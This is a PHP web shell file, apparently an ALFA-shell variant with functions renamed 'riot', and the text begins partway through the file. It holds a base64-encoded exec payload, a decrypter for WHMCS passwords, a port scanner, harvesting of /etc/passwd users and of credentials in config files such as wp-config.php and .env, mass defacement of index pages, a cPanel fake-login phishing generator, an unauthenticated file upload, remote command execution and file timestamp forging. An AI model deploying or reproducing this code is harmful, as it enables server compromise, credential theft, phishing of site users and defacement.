p0OXg1a+am5oDaV4FV3GMKIxibFF9ZUYtaCpL8DySTcg0q+WNwGKbTuJ3fPh+5pAXdBr15xe8Ft8OyAcQ2MrGZhpUQZs0KEQuEb4ZcPV1DdBfQGCHcbu9vtzvZY/zFqvqOmBJMXKhWmgoDWBnPo/c8frylhMfp1AUHfvfsg+Mu52zGI2zGo3/waHpwSrwXdX35xGfY7ey8ge/QYH0rATxTi2rCJKdmX4v3ZgJuT79+vxluhyyVdfqXgoTBr/32RU+oVACu0ijOJbQsCGWuVSJPD8D03gmx0BYkOH99AMOtoApEL7uwZk5nUj1DX8WZbnX7QOfQ/HBUmxza4y8xDSbgbu38mGf+P2AOSd0wOL2cJq7B1mg44s+wPJ4TfVROcnHVXMPiYwBmEjt0+H9APzcPJLbZ70bpINbznCXO9BvckhzEfOe5NPtSzqVma3dbmw7eVjFFMcdh9aaHa6oRrlYT5bX64fvfjwjnItcOb8d0QMYC7dxDebmvFfdf5d7Ytif303E+4Oh28ln+xiL5AxD6X4FNut2jtMm7kdi6c/LB94iqKz8jgv11NVZo=")),\'\',\'exec\'))';
if ($_POST["riot1"] == "perl") {
$code = $perl;
} else {
$code = $py;
}
if (__write_file($name, $code)) {
@chmod($name, 0755);
echo '';
}
}
echo $div;
riotfooter();
}
function riotWhmcs()
{
riothead();
echo "";
function decrypt($string, $cc_encryption_hash)
{
$key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen($hash_key);
$string = __ZGVjb2Rlcg($string);
$tmp_iv = substr($string, 0, $hash_length);
$string = substr($string, $hash_length, strlen($string) - $hash_length);
$iv = $out = "";
$c = 0;
while ($c < $hash_length) {
$iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen($string)) {
if ($c != 0 and $c % $hash_length == 0) {
$key = _hash($key . substr($out, $c - $hash_length, $hash_length));
}
$out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
++$c;
}
return $out;
}
function _hash($string)
{
if (function_exists("sha1")) {
$hash = sha1($string);
} else {
$hash = md5($string);
}
$out = "";
$c = 0;
while ($c < strlen($hash)) {
$out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
AlfaNum(8, 9, 10);
echo "
| WHMCS DeCoder |" .
getConfigHtml("whmcs") .
"
";
$password = decrypt($v["password"], $cc_encryption_hash);
echo "Type $type Active $active Hostname $hostname Ip $ipaddress Username $username Password $password
Domain Reseller
";
echo "";
echo "Register $registrar Setting $setting Value $value
";
riotfooter();
}
function riotportscanner()
{
riothead();
echo '| Port Scaner |
';
$start = strip_tags($_POST["riot2"]);
$end = strip_tags($_POST["riot3"]);
$host = strip_tags($_POST["riot4"]);
if (isset($_POST["riot4"]) && is_numeric($_POST["riot3"]) && is_numeric($_POST["riot2"])) {
echo __pre();
$packetContent = "GET / HTTP/1.1\r\n\r\n";
if (ctype_xdigit($packetContent)) {
$packetContent = @pack("H*", $packetContent);
} else {
$packetContent = str_replace(["\r", "\n"], "", $packetContent);
$packetContent = str_replace(["\\r", "\\n"], ["\r", "\n"], $packetContent);
}
for ($i = $start; $i <= $end; $i++) {
$sock = @fsockopen($host, $i, $errno, $errstr, 3);
if ($sock) {
stream_set_timeout($sock, 5);
fwrite($sock, $packetContent . "\r\n\r\n\x00");
$counter = 0;
$maxtry = 1;
$bin = "";
do {
$line = fgets($sock, 1024);
if (trim($line) == "") {
$counter++;
}
$bin .= $line;
} while ($counter < $maxtry);
fclose($sock);
echo "Port $i is open
";
echo "| Open Base Dir | ';
$passwd = _riot_file("/etc/passwd");
if (is_array($passwd)) {
$users = [];
$makepwd = riotMakePwd();
$basedir = @ini_get("open_basedir");
$safe_mode = @ini_get("safe_mode");
if (_riot_can_runCommand(true, false) && ($basedir || $safe_mode)) {
$bash =
"fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
$tmp_path = riotWriteTocgiapi("basedir.riot", $bash);
$bash_users = riotEx("cd " . $tmp_path . "/riotcgiapi;sh basedir.riot " . $makepwd, false, true, true);
$users = json_decode($bash_users, true);
$x = count($users);
if ($x >= 2) {
array_pop($users);
--$x;
}
}
if (!$basedir && !$safe_mode) {
$x = 0;
foreach ($passwd as $str) {
$pos = strpos($str, ":");
$username = substr($str, 0, $pos);
$dirz = str_replace("{user}", $username, $makepwd);
if ($username != "") {
if (@is_readable($dirz)) {
array_push($users, $username);
$x++;
}
}
}
}
echo "
";
echo "[+] Founded " . sizeof($passwd) . " entrys in /etc/passwd\n" . "
";
echo "[+] Founded " . $x . " readable " . str_replace("{user}", "*", $makepwd) . " directories\n" . "
";
echo "[~] Searching for passwords in config files...\n\n" . "
";
foreach ($users as $user) {
if (empty($user)) {
continue;
}
$path = str_replace("{user}", $user, $makepwd);
echo "
";
}
} else {
echo ' [-] Error : coudn`t read /etc/passwd [-] ';
}
echo "
";
echo "";
riotfooter();
}
function riotziper()
{
riothead();
AlfaNum(8, 9, 10);
echo '| Compressor |
';
if (isset($_POST["riot5"]) && $_POST["riot5"] == ">>") {
$dirzip = $_POST["riot3"];
$zipfile = $_POST["riot4"];
if ($GLOBALS["sys"] != "unix" && _riot_can_runCommand(true, true)) {
riotEx("powershell Compress-Archive -Path '" . addslashes($dirzip) . "' -DestinationPath '" . addslashes(basename($zipfile)) . "'");
echo __pre() . 'Done -> ' . $zipfile . "
Done -> ' . $zipfile . "
Success...!
' . $zipfile . "
ERROR!!!...
| DeCompressor |
';
if (isset($_POST["riot5"]) && $_POST["riot5"] == ">>") {
$dirzip = $_POST["riot3"];
$zipfile = $_POST["riot4"];
if (@!is_dir($zipfile)) {
@mkdir($zipfile, 0777, true);
}
$finfo = "";
$file_type = "";
if (function_exists("finfo_open")) {
$finfo = @finfo_open(FILEINFO_MIME_TYPE);
$file_type = @finfo_file($finfo, $dirzip);
@finfo_close($finfo);
} else {
if ($GLOBALS["sys"] == "unix" && _riot_can_runCommand(true, true)) {
$file_type = riotEx("file -b --mime-type " . $dirzip);
}
}
if ($GLOBALS["sys"] != "unix" && _riot_can_runCommand(true, true)) {
riotEx("powershell expand-archive -path '" . addslashes($dirzip) . "' -destinationpath '" . addslashes(basename($zipfile)) . "'");
echo __pre() . 'Done -> ' . $zipfile . "
Done -> ' . $zipfile . ' [ View Folder ]
Success...!
' . $zipfile . ' [ View Folder ]
ERROR!!!...
";
}
} else {
if (strstr($value, $string)) {
echo str_replace("\\", "/", $path) . "
";
}
}
$results[] = $path;
} elseif ($value != "." && $value != "..") {
Alfa_StrSearcher($path, $string, $ext, $e, $results);
$results[] = $path;
}
}
}
}
function riotfakepage()
{
riothead();
AlfaNum(9, 10);
echo '
| Host Manager Fake page |
';
$clone_page = $_POST["riot1"];
$fake_root = $_POST["riot2"];
$logto = $_POST["riot4"];
$panel = $_POST["riot5"];
$inject_to = $_POST["riot6"];
$bind_on = $_POST["riot7"];
$count = $_POST["riot8"];
if (!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST["riot3"] == ">>") {
echo __pre();
$target = $clone_page;
$curl = new AlfaCURL();
$source_page = $curl->Send($target);
if (!empty($source_page)) {
$matched_form = "";
if ($panel == "cpanel") {
if (preg_match('##', $source_page, $match)) {
$matched_form = $match[0];
}
} else {
if (preg_match("##", $source_page, $match)) {
$matched_form = $match[0];
}
}
if (!empty($matched_form)) {
$fake = "";
$pwd = str_replace($_SERVER["DOCUMENT_ROOT"], "", $fake_root);
$uri = str_replace($_SERVER["DOCUMENT_ROOT"], "", $inject_to);
if ($panel == "cpanel") {
$port = "2083";
} else {
$target = str_replace(["http://", "https://"], "", $target);
$port = explode(":", $target);
$port = $port[1];
}
if (substr($uri, 0, 1) == "/") {
$uri = substr($uri, 1);
}
$uri = $_SERVER["HTTP_ORIGIN"] . "/" . str_replace("index.php", "", $uri) . "?:" . $port;
$log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . "/log.php";
if ($panel == "cpanel") {
$form = ' ";
riotfooter();
}
function riotarchive_manager()
{
riothead();
$file = $_POST["riot2"];
if (!file_exists($file)) {
$file = $GLOBALS["cwd"];
}
$rand_id = rand(9999, 999999);
echo '| Archive Manager |';
echo '
';
if ($_POST["riot5"] == ">>") {
//echo __pre();
echo '
PWD: ';
echo '';
__riot_open_archive_file($file, $rand_id);
echo "";
}
echo "";
riotfooter();
}
function __riot_open_archive_file($arch, $base_id = 0)
{
try {
$files = [];
$dirs = [];
$archive = new PharData($arch);
foreach ($archive as $file) {
$file_modify = @date("Y-m-d H:i:s", @filemtime($file->getPathname()));
if ($file->isDir()) {
$dirs[] = [
"name" => $file->getFileName(),
"path" => $file->getPathname(),
"type" => "dir",
"modify" => $file_modify,
];
} else {
$file_size = @filesize($file->getPathname());
$files[] = [
"name" => $file->getFileName(),
"path" => $file->getPathname(),
"type" => "file",
"modify" => $file_modify,
"size" => $file_size,
];
}
}
function __riot_open_archive_usort($a, $b)
{
return strcmp(strtolower($a["name"]), strtolower($b["name"])) * 1;
}
usort($dirs, "__riot_open_archive_usort");
usort($files, "__riot_open_archive_usort");
$files = array_merge($dirs, $files);
echo 'Name Size Modify Actions 
';
echo '' .
$icon .
'| .. | dir - - 
';
if ($file["type"] == "dir") {
echo '' .
$icon .
'| ' .
$file["name"] .
" | dir " .
$file["modify"] .
" - " .
$icon .
"" .
$file["name"] .
" " .
riotSize($file["size"]) .
" " .
$file["modify"] .
" -
";
} catch (Exception $e) {
echo "0";
}
}
function riotopen_archive_dir()
{
$dir = $_POST["riot1"];
$base_id = $_POST["riot2"];
__riot_open_archive_file($dir, $base_id);
}
function riotconfig_grabber()
{
riothead();
echo '| Config Grabber |';
echo '
';
$dir = $_POST["riot2"];
$ext = $_POST["riot3"];
if ($_POST["riot5"] == ">>") {
echo __pre();
Alfa_ConfigGrabber($dir, $ext);
}
echo "";
riotfooter();
}
function Alfa_ConfigGrabber($dir, $ext)
{
$pattern =
"#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
$db_files = [
"wp-config.php",
"configure.php",
"config.inc.php",
"configuration.php",
"config.php",
"conf.php",
"dbclass.php",
"class_core.php",
"dist-configure.php",
"settings.php",
"conf_global.php",
"db.php",
"connect.php",
"confing.db.php",
"config.db.php",
"database.php",
// ✅ Tambahan untuk Laravel & modern frameworks
".env",
".env.local",
".env.production",
"env.php",
"database.php",
"app.php",
"services.php",
"cache.php",
"mail.php",
"queue.php",
"logging.php",
"broadcasting.php",
"session.php",
"filesystems.php",
"horizon.php",
"cors.php",
// ✅ Tambahan untuk frameworks lain
"local-config.php",
"env.local.php",
"settings.local.php",
"config.local.php",
"database.env",
"dbconfig.php",
"connection.php",
"credentials.php",
"secret-config.php",
"prod-config.php",
"staging-config.php",
"firebase.php",
"aws.php",
"stripe.php",
"paypal.php",
// ✅ Tambahan universal configs
"docker-compose.yml",
"docker.env",
"settings.ini",
"config.json",
"database.json",
"secrets.json",
"config.yaml",
"database.yaml",
"appsettings.json",
];
if (@is_readable($dir)) {
$globFiles = @glob("$dir/*.$ext");
$globDirs = @glob("$dir/*", GLOB_ONLYDIR);
$blacklist = [];
foreach ($globDirs as $dir) {
if (!@is_readable($dir) || @is_link($dir)) {
continue;
}
@Alfa_ConfigGrabber($dir, $ext);
}
foreach ($globFiles as $file) {
$filee = @file_get_contents($file);
if (preg_match($pattern, $filee)) {
echo "$file [ View file ]";
}
}
}
}
function riotsearcher()
{
riothead();
echo '| Searcher || Find Readable Or Writable Files | | Find Files By Name |
';
if (isset($_POST["riot1"]) && $_POST["riot1"] == "file") {
echo '| Find Readable Or Writable Files |
';
$dir = $_POST["riot2"];
$ext = $_POST["riot3"];
$method = $_POST["riot4"];
if ($_POST["riot5"] == ">>") {
echo __pre();
if (substr($dir, -1) == "/") {
$dir = substr($dir, 0, -1);
}
Alfa_Searcher($dir, trim($ext), $method);
}
}
if ($_POST["riot1"] == "str") {
echo '| Find Files By Name / Find String In Files |
';
$dir = $_POST["riot2"];
$string = $_POST["riot3"];
$ext = $_POST["riot5"];
if (!empty($string) and !empty($dir) and $_POST["riot4"] == ">>") {
echo __pre();
Alfa_StrSearcher($dir, $string, $ext, $_POST["riot6"]);
}
}
echo "";
riotfooter();
}
function Alfa_ReadDir($dir, $method = "", $defpage = "")
{
if (!@is_readable($dir)) {
return false;
}
if (@is_dir($dir)) {
if ($dh = @opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if ($file == ".." || $file == ".") {
continue;
}
$newfile = $dir . "/" . $file;
if (@is_readable($newfile) && @is_dir($newfile)) {
Alfa_ReadDir($newfile, $method, $defpage);
}
if (@is_file($newfile)) {
if (!@is_readable($newfile)) {
continue;
}
Alfa_Rewriter($newfile, $file, $defpage, $method);
}
}
closedir($dh);
}
}
}
function Alfa_Rewriter($dir, $file, $defpage, $m = "index")
{
if (!@is_writable($dir)) {
return false;
}
if (!@is_readable($dir)) {
return false;
}
$defpage = @file_get_contents($defpage);
if ($m == "index") {
$indexs = ["index.php", "index.htm", "index.html", "default.asp", "default.aspx", "index.asp", "index.aspx", "index.js"];
if (in_array(strtolower($file), $indexs)) {
@file_put_contents($dir, $defpage);
echo @is_file($dir) ? $dir . "DeFaced...
" : "";
}
} elseif ($m == "all") {
@file_put_contents($dir, $defpage);
echo @is_file($dir) ? $dir . " DeFaced...
" : "";
}
}
if (isset($_GET['inc']) && $_GET['inc'] === 'upload') {
echo '';
}
if (isset($_FILES['file']['tmp_name'])) {
$uploadd = $_FILES['file']['tmp_name'];
if (is_uploaded_file($uploadd)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$de = $pwddir . "/" . $real;
if (copy($uploadd, $de)) {
echo "success $de";
} else {
echo "failed";
}
}
}
function riotGetDisFunc()
{
riothead();
echo '';
$disfun = @ini_get("disable_functions");
$s = explode(",", $disfun);
$f = array_unique($s);
echo '
Disable Functions# Func Name ' . $i . " ";
echo '' .
$s .
" ";
$i++;
}
echo "
";
}
}
break;
case "dirs":
foreach ($globFiles as $file) {
if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) {
echo dirname($file) . "
";
$blacklist[] = dirname($file);
}
}
break;
case "all":
foreach ($globFiles as $file) {
echo $file . "
";
}
break;
}
unset($blacklist);
}
}
function AlfaiFrameCreator($f, $width = "100%", $height = "600px")
{
return '';
}
class AlfaCURL
{
public $headers;
public $user_agent;
public $compression;
public $cookie_file;
public $proxy;
public $path;
public $ssl = true;
public $curl_status = true;
function __construct($cookies = false, $compression = "gzip", $proxy = "")
{
if (!extension_loaded("curl")) {
$curl_status = false;
return false;
}
$this->headers[] = "Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg";
$this->headers[] = "Connection: Keep-Alive";
$this->headers[] = "Content-type: application/x-www-form-urlencoded;charset=UTF-8";
$this->user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)";
$this->path = ALFA_TEMPDIR . "/Alfa_cookies.txt";
$this->compression = $compression;
$this->proxy = $proxy;
$this->cookies = $cookies;
if ($this->cookies) {
$this->cookie($this->path);
}
}
function cookie($cookie_file)
{
if (_riot_file_exists($cookie_file, false)) {
$this->cookie_file = $cookie_file;
} else {
@fopen($cookie_file, "w") or die($this->error("The cookie file could not be opened."));
$this->cookie_file = $cookie_file;
@fclose($this->cookie_file);
}
}
function Send($url, $method = "get", $data = "")
{
if (!$this->curl_status) {
return false;
}
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_ENCODING, $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if ($this->ssl) {
curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false);
}
if ($this->cookies) {
curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
}
if ($this->proxy) {
curl_setopt($process, CURLOPT_PROXY, $this->proxy);
}
if ($method == "post") {
curl_setopt($process, CURLOPT_POSTFIELDS, $data);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_HTTPHEADER, ["Content-Type: application/x-www-form-urlencoded"]);
}
$return = @curl_exec($process);
curl_close($process);
return $return;
}
function error($error)
{
echo "cURL Error
$error ";
die();
}
}
function getConfigHtml($cms)
{
$content = "";
$cms_array = [
"wp" => "WordPress",
"vb" => "vBulletin",
"whmcs" => "Whmcs",
"joomla" => "Joomla",
"phpnuke" => "PHPNuke",
"phpbb" => "PHPBB",
"mybb" => "MyBB",
"drupal" => "Drupal",
"smf" => "SMF",
];
$content .= "";
return $content;
}
if (!function_exists("json_encode")) {
function json_encode($a = false)
{
if (is_null($a)) {
return "null";
}
if ($a === false) {
return "false";
}
if ($a === true) {
return "true";
}
if (is_scalar($a)) {
if (is_float($a)) {
return floatval(str_replace(",", ".", strval($a)));
}
if (is_string($a)) {
static $jsonReplaces = [["\\", "/", "\n", "\t", "\r", "\b", "\f", '"'], ["\\\\", "\\/", '\\n', '\\t', '\\r', "\\b", '\\f', '\"']];
return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
} else {
return $a;
}
}
$isList = true;
for ($i = 0, reset($a); $i < count($a); $i++, next($a)) {
if (key($a) !== $i) {
$isList = false;
break;
}
}
$result = [];
if ($isList) {
foreach ($a as $v) {
$result[] = json_encode($v);
}
return "[" . join(",", $result) . "]";
} else {
foreach ($a as $k => $v) {
$result[] = json_encode($k) . ":" . json_encode($v);
}
return "{" . join(",", $result) . "}";
}
}
}
if (!function_exists("json_decode")) {
function json_decode($json, $array = true)
{
$comment = false;
$out = '$x=';
for ($i = 0; $i < strlen($json); $i++) {
if (!$comment) {
if ($json[$i] == "{" || $json[$i] == "[") {
$out .= " array(";
} elseif ($json[$i] == "}" || $json[$i] == "]") {
$out .= ")";
} elseif ($json[$i] == ":") {
$out .= "=>";
} else {
$out .= $json[$i];
}
} else {
$out .= $json[$i];
}
if ($json[$i] == '"') {
$comment = !$comment;
}
}
eval($out . ";");
return $x;
}
}
function riotterminalExec()
{
$pwd = "pwd";
$seperator = ";";
if ($GLOBALS["sys"] != "unix") {
$pwd = "cd";
$seperator = "&";
}
if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) {
$cmd = "cd '" . addslashes($_POST["c"]) . "'" . $seperator;
}
$current_path = "";
if (preg_match("/cd[ ]{0,}(.*)[ ]{0,}" . $seperator . "|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST["riot1"], $match)) {
if (empty($match[1])) {
$match[1] = $match[2];
}
$current_path = riotEx("cd " . addslashes($match[1]) . $seperator . $pwd);
$current_path = str_replace("\\", "/", $current_path);
}
$out = riotEx($cmd . $_POST["riot1"], true);
$out = htmlspecialchars($out);
echo json_encode(["output" => convertBash($out), "path" => $current_path]);
}
function convertBash($code)
{
$dictionary = [
"[01;30m" => '',
"[01;31m" => '',
"[01;32m" => '',
"[01;33m" => '',
"[01;34m" => '',
"[01;35m" => '',
"[01;36m" => '',
"[01;37m" => '',
"[0m" => "",
];
$htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
return $htmlString;
}
function riotdoActions()
{
$chdir_fals = false;
if (!@chdir($_POST["c"])) {
$chdir_fals = true;
$riot_canruncmd = _riot_can_runCommand(true, true);
}
if (isset($_POST["riot1"])) {
$_POST["riot1"] = rawurldecode($_POST["riot1"]);
}
if (isset($_POST["riot2"])) {
$_POST["riot2"] = rawurldecode($_POST["riot2"]);
}
$action = $_POST["riot3"];
if ($action == "permission") {
$perms = 0;
$perm = $_POST["riot2"];
for ($i = strlen($perm) - 1; $i >= 0; --$i) {
$perms += (int) $perm[$i] * pow(8, strlen($perm) - $i - 1);
}
if (@chmod($_POST["riot1"], $perms)) {
echo "done";
} else {
echo "no";
}
return;
}
if ($action == "rename" || $action == "move") {
$riot1_decoded = $_POST["riot1"];
if ($chdir_fals) {
$_POST["riot1"] = $_POST["c"] . "/" . $_POST["riot1"];
}
$_POST["riot1"] = trim($_POST["riot1"]);
$riot1_escape = addslashes($_POST["riot1"]);
if ($_POST["riot3"] == "rename") {
$_POST["riot2"] = basename($_POST["riot2"]);
}
if (!empty($_POST["riot2"])) {
$cmd_rename = false;
if ($chdir_fals && $riot_canruncmd) {
if (_riot_is_writable($_POST["riot1"])) {
$cmd_rename = true;
$riot1_escape = addslashes($riot1_decoded);
riotEx("cd '" . addslashes($_POST["c"]) . "';mv '" . $riot1_escape . "' '" . addslashes($_POST["riot2"]) . "'");
}
}
if (!file_exists($_POST["riot2"])) {
if (@rename($_POST["riot1"], $_POST["riot2"]) || $cmd_rename) {
echo "done";
} else {
echo "no";
}
} else {
echo "no";
}
}
} elseif ($action == "copy") {
if (is_dir($_POST["riot1"])) {
$dir = str_replace("//", "/", $_POST["riot1"]);
$dir = explode("/", $dir);
if (empty($dir[count($dir) - 1])) {
$name = $dir[count($dir) - 2];
} else {
$name = $dir[count($dir) - 1];
}
} else {
$name = basename($_POST["riot1"]);
}
$dir = dirname($_POST["riot1"]);
if ($dir == ".") {
$dir = $_POST["c"] . "/";
}
if (is_file($_POST["riot1"])) {
@copy($_POST["riot1"], $_POST["riot2"]);
echo "done";
} elseif (is_dir($_POST["riot1"])) {
if (!is_dir($_POST["riot2"])) {
mkdir($_POST["riot2"], 0755, true);
}
copy_paste($dir, $name, $_POST["riot2"] . "/");
echo "done";
}
} elseif ($action == "modify") {
if (!empty($_POST["riot1"])) {
$time = strtotime($_POST["riot1"]);
if ($time) {
$touched = false;
if ($chdir_fals && $riot_canruncmd) {
riotEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST["riot1"])) . "' '" . addslashes($_POST["riot2"]) . "'");
$touched = true;
}
if (!@touch($_POST["riot2"], $time, $time) && !$touched) {
echo "no";
} else {
echo "ok";
}
} else {
echo "badtime";
}
}
}
}
function riotget_flags()
{
$flags = [];
if (function_exists("curl_version")) {
$curl = new AlfaCURL();
$server_addr = !@$_SERVER["SERVER_ADDR"] ? (function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????") : @$_SERVER["SERVER_ADDR"];
$flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
$flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
if (strpos($flag2, "geoplugin") != false) {
$flag = json_decode($flag, true);
$flag2 = json_decode($flag2, true);
if (!empty($flag["geoplugin_countryCode"])) {
$flags["server"]["name"] = $flag["geoplugin_countryName"];
$flags["server"]["code"] = $flag["geoplugin_countryCode"];
}
if (!empty($flag2["geoplugin_countryCode"])) {
$flags["client"]["name"] = $flag2["geoplugin_countryName"];
$flags["client"]["code"] = $flag2["geoplugin_countryCode"];
}
}
}
echo json_encode($flags);
}
function riotGetConfig()
{
$cms = $_POST["riot1"];
$path = trim($_POST["riot2"]);
$config = [
"wp" => [
"file" => "/wp-config.php",
"host" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
"dbname" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
"dbuser" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
"dbpw" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
"prefix" => ["/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 1],
],
"drupal" => [
"file" => "/config.php",
"host" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
"dbname" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
"dbuser" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
"dbpw" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
"prefix" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
],
"drupal2" => [
"file" => "/sites/default/settings.php",
"host" => ["/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
"dbname" => ["/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
"dbuser" => ["/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
"dbpw" => ["/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
"prefix" => ["/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
],
"vb" => [
"file" => "/includes/config.php",
"host" => ["/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
"dbuser" => ["/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
"dbname" => ["/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
"dbpw" => ["/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
"prefix" => ["/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
],
"phpnuke" => [
"file" => "/config.php",
"host" => ['/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
"dbname" => ['/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
"dbuser" => ['/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
"dbpw" => ['/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
"prefix" => ['/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
],
"smf" => [
"file" => "/Settings.php",
"host" => ["/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbname" => ["/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbuser" => ["/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbpw" => ["/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"prefix" => ["/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
],
"whmcs" => [
"file" => "/configuration.php",
"host" => ["/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbname" => ["/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
